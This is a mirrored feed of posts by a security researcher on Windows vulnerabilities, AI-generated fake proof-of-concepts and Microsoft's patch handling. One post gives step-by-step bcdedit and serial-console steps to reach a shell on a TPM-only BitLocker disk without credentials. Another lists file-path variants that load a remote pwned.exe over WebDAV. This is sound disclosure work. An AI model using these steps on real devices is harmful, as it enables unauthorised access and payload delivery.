GNU social JP
  • FAQ
  • Login
GNU social JPは日本のGNU socialサーバーです。
Usage/ToS/admin/test/Pleroma FE
  • Public

    • Public
    • Network
    • Groups
    • Featured
    • Popular
    • People

Notices by Will Dormann (wdormann@infosec.exchange)

  1. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Sunday, 19-Jul-2026 12:18:10 JST Will Dormann Will Dormann

    In today's episode of Will doesn't understand why some films get universal acclaim: Project Hail Mary.

    Starts out Sci Fi, but somehow morphs into a buddy comedy (with an alien) for kids?

    Also, to go through pains to clearly show how the alien uses echolocation for vision, and then later on we're expected to completely forget that and just believe that it's watching computer screens and projections. How does that even happen? I get it that 3 hours is a long film, but shouldn't the filmmaker remember what they just did?

    To each their own, I suppose.

    In conversation about a month ago from infosec.exchange permalink
  2. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 16-Jul-2026 23:52:48 JST Will Dormann Will Dormann
    in reply to
    • Kevin Beaumont

    @GossiTheDog
    I mean, if I tell Cursor to run git, then it'll run the one in the repo. Which I guess is bad.

    But that's significantly more user interaction required than the A developer opens a repository in Cursor on Windows requirement that Mindgard says. 🤷♂️

    Somewhat interesting that Cursor recognized the presence of a fake Windows Calculator git.exe, but only after executing it. 😂

    In conversation about a month ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/919/799/931/893/714/original/b1663abec13b6542.png
  3. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 16-Jul-2026 23:52:48 JST Will Dormann Will Dormann
    in reply to
    • Kevin Beaumont

    @GossiTheDog
    I see it check for git.exe, but I see no evidence of it attempting to run it. 🤷♂️

    In conversation about a month ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/919/749/834/240/097/original/b5d38eb39b0e3d46.png
  4. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 16-Jul-2026 23:52:47 JST Will Dormann Will Dormann
    in reply to
    • Kevin Beaumont

    @GossiTheDog
    OK, I guess my mistake was not WAITING THIRTY MINUTES. 🤦♂️
    https://infosec.exchange/@wdormann/116930022612132890

    In conversation about a month ago from infosec.exchange permalink

    Attachments

    1. Domain not in remote thumbnail source whitelist: media.infosec.exchange
      Will Dormann (@wdormann@infosec.exchange)
      from Will Dormann
      Attached: 2 images @nyanbinary @mttaggart @ajn142 @Sempf @ifin OK, I guess I was just too impatient. I was able to reproduce it by leaving Cursor open for **THIRTY MINUTES**. At that point it launched the `git.exe` in the repo root. In my screenshots, I opened the repo at `6:17:13`. Only at `6:47:14` did it look for a `git.exe` in the repo root to launch.
  5. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 16-Jul-2026 23:50:02 JST Will Dormann Will Dormann
    • Kevin Beaumont

    @GossiTheDog
    Will only automatically apply with October's updates.

    The Opt-in remediation section has no indicator that it won't work until then.

    In conversation about a month ago from infosec.exchange permalink
  6. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Wednesday, 15-Jul-2026 21:56:57 JST Will Dormann Will Dormann

    So NightmareEclipse has released a new tool called LegacyHive

    Either I don't know what it's supposed to do, or it doesn't work.

    While the tool is running, there is a new pair of 1003 registry keys loaded into HKEY_USERS. But it's not possible to view its contents. 🤷♂️

    In conversation about a month ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/924/057/051/412/616/original/d89ebf9b08f7468c.png
  7. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Tuesday, 16-Jun-2026 04:26:15 JST Will Dormann Will Dormann

    I just realized that I'm personally "credited" in April's Microsoft Patch Tuesday with a CVE-less "Defense-in-depth" update.

    The vulnerability?
    CAB files downloaded from the internet do not write the MotW for files extracted from them.

    I reported this to MSRC, and after refusing to generate a screen recording of the exploit (I mean, really?!), they finally acknowledged the problem. However, they went radio silent after that.

    Mark of the Web (MotW) evasions have gotten CVEs in the past. If we look in the last 2 years we have: CVE-2024-38213, CVE-2024-38217, CVE-2024-43487, CVE-2025-24061, CVE-2025-27472, CVE-2025-47160, CVE-2025-49740, CVE-2026-20824, CVE-2026-32225, CVE-2026-45595

    So, why does "Windows doesn't write MotW for extracted CAB file contents" get a CVE? Well, Microsoft is a CNA. So for the most part they can invent any rules that they'd like to play by. It could be as simple as "We're not particularly fond of you", and as a result, we have a vulnerability with no ID to track it.

    Here's a screen recording of a VM with March's Patch Tuesday level of updates. When you extract a file from a CAB file, no MotW is written. And as such, we get no protections that leverage the presence of MotW, such as SmartScreen, Smart Application Control, Office Protected View. In this case, we have a .URL file in a CAB. Double clicking on it results in a remote EXE running on your computer with no warning or other prompts. But, I suppose we all know that URL files are evil and have them blocked.

    In conversation about 2 months ago from infosec.exchange permalink

    Attachments


  8. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Saturday, 13-Jun-2026 06:52:20 JST Will Dormann Will Dormann
    in reply to

    Someone on the Bad Site pointed out that the exploit only triggers upon entry to a Defender Offline scan. To which the author replied:

    Exactly why I kept repeating the victim machine needed to have at least one offline scan initiated before the attack can be done without authentication.

    So at the end of the day, I think GreatXML is a thing you can do do someone's computer that results in the comouter's administrator themselves getting an unexpected privileged command prompt.

    So what? 🤷♂️

    In conversation about 2 months ago from infosec.exchange permalink

    Attachments



  9. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Friday, 12-Jun-2026 03:37:59 JST Will Dormann Will Dormann

    Nightmare Eclipse has posted another purported bitlocker bypass: GreatXML

    This exploit claims to be able to bypass bitlocker on systems that have executed Microsoft Defender Offline at some point in the past. This is done by replacing Recovery\WindowsRE\ReAgent.xml and placing unattend.xml in the WinRE partition.

    I think the writeup is flawed in that the spawned CMD.EXE happens on the NEXT time that a Microsoft Defender Offline scan is triggered. And in order to trigger a Microsoft Defender Offline scan, you both need to be logged in to Windows, and also have admin credentials. And if you've already got that level of access, you can just turn off bitlocker.

    The writeup for GreatXML suggests that the prerequisite is that Windows Defender Offline has been executed at some point in the past. And that after planting two files in WinRE, all you need to do is [Shift]-reboot into WinRE, and Windows will automatically go into Microsoft Defender Offline scan mode. But this is not the case in any of the 3 lineages of Win11 that I have handy.

    If you only [Shift]-reboot into WinRE, you get the normal WinRE menu. Not anything related to Microsoft Defender Offline. Even after the placement of the specified files.

    In conversation about 2 months ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/729/307/229/990/097/original/e2c89f7f2e62d773.png

    2. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/729/308/412/773/757/original/5457e4e3515430d4.png
  10. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Saturday, 06-Jun-2026 22:44:37 JST Will Dormann Will Dormann

    Well, bitskrieg is public.

    While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal (getting access to a TPM-only Bitlocker encrypted disk, without knowing any credentials on the system). Though it requires a second computer, or a device that can communicate on a serial port. VM reproduction requires adding a serial port to the VM. Physical machines can reproduce the same with a supported USB-to-serial device.

    1. Boot into WinRe (hold [shift] when clicking reboot button)
    2. Go to a command prompt, ignoring the prompt to enter a bitlocker recovery key. (Click Skip this drive)
    3. Enable Emergency Management Services (EMS) to use a serial port as the EMS port.
    bcdedit /set ems 1
    bcdedit /set emsport 1
    1. Reboot back into WinRe
    2. From your other computer, connect to the serial port.
    3. Type:

    cmd
    [esc]
    tab
    -

    1. Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.
    In conversation about 3 months ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/699/346/597/829/269/original/0c5221374e711be1.png
  11. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:14 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    Reference?

    In conversation about 3 months ago from infosec.exchange permalink
  12. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:13 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    Ah, so you've confirmed that it works?
    With AI and clout seeking these days, we've long passed the "PoC exists on Github" thing having any meaning whatsoever. 😂

    Personally, I couldn't get that one to do anything.

    In conversation about 3 months ago from infosec.exchange permalink
  13. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:12 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    Yeah, I've seen what it claims to do.
    But either they are hand-waving over a critical requirement of what it takes to repro, or it's fake.

    In conversation about 3 months ago from infosec.exchange permalink
  14. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:10 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    😂

    I miss the days when things like this were written by humans, using logic and facts. As opposed to statistically plausible slop.

    In conversation about 3 months ago from infosec.exchange permalink
  15. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:08 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    I also tested another PoC and it was even more fake. i.e. it didn't even create a CLDAP structure that made sense.

    I get that PoC||GTFO is a thing, but we've clearly entered a phase where it needs to be Verified PoC||GTFO. 🤦♂️

    In conversation about 3 months ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/692/083/358/777/859/original/77e9c8cd6e0af56f.png
  16. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Thursday, 04-Jun-2026 23:54:08 JST Will Dormann Will Dormann
    in reply to
    • Dr. Christopher Kunz

    @christopherkunz
    Yes, my test environments (unpatched Server 2016, 2022, and 2025) all had a maximum DNS suffix of 64 chars. (Longer isn't allowed)

    In conversation about 3 months ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/692/049/575/250/713/original/3ef786e32d2e758c.png

    2. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/692/058/641/106/787/original/9d54baff81429e7d.png

    3. https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/692/066/460/411/287/original/66e42781919dfaa6.png
  17. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Wednesday, 03-Jun-2026 08:17:08 JST Will Dormann Will Dormann
    • Kevin Beaumont

    @GossiTheDog
    I only ended up with my list after seeing lots of unexpected URIs in the samples I've been pulling from VT, and decided to do some testing.

    I recall something in my past where the use of \\example.com@80\DavWWWRoot\pwned.exe would be more likely to start the WebClient service automatically. But for .URL files, none of that is necessary.

    In conversation about 3 months ago from infosec.exchange permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      Example Domain
  18. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Wednesday, 03-Jun-2026 06:42:11 JST Will Dormann Will Dormann
    • Kevin Beaumont

    @GossiTheDog
    At least in my case, that's covered by the \\example.com\pwned.exe case.

    In conversation about 3 months ago from infosec.exchange permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      Example Domain
  19. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Wednesday, 03-Jun-2026 06:24:20 JST Will Dormann Will Dormann

    In preparation for an upcoming blog post, I wondered about the various ways that Windows can refer to a remote WebDAV resource.

    These all work:

    \\example.com\pwned.exe
    \/example.com\pwned.exe
    file://example.com\pwned.exe
    file:/\example.com\pwned.exe
    file:\/example.com\pwned.exe
    file:\\example.com\pwned.exe
    file:////example.com\pwned.exe
    file:///\example.com\pwned.exe
    file://\/example.com\pwned.exe
    file://\\example.com\pwned.exe
    file:/\//example.com\pwned.exe
    file:/\/\example.com\pwned.exe
    file:/\\/example.com\pwned.exe
    file:/\\\example.com\pwned.exe
    file:\///example.com\pwned.exe
    file:\//\example.com\pwned.exe
    file:\/\/example.com\pwned.exe
    file:\/\\example.com\pwned.exe
    file:\\//example.com\pwned.exe
    file:\\/\example.com\pwned.exe
    file:\\\/example.com\pwned.exe
    file:\\\\example.com\pwned.exe

    These don't, presumably because windows treats the leading / as meaning it comes from the local filesystem:

    //example.com\pwned.exe
    /\example.com\pwned.exe
    In conversation about 3 months ago from infosec.exchange permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      Example Domain

  20. Embed this notice
    Will Dormann (wdormann@infosec.exchange)'s status on Saturday, 30-May-2026 23:58:58 JST Will Dormann Will Dormann
    in reply to
    • Sheldon

    @sysop408
    You mean Outlook (classic) or Outlook (new)? 😂

    In conversation about 3 months ago from infosec.exchange permalink
  • Before

User actions

    Will Dormann

    Will Dormann

    I play with vulnerabilities and exploits. I used to be https://twitter.com/wdormann but Twitter has become unbearable, so here I am.

    Tags
    • (None)

    Following 0

      Followers 0

        Groups 0

          Statistics

          User ID
          232810
          Member since
          16 Jan 2024
          Notices
          186
          Daily average
          0

          Feeds

          • Atom
          • Help
          • About
          • FAQ
          • TOS
          • Privacy
          • Source
          • Version
          • Contact

          GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

          Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.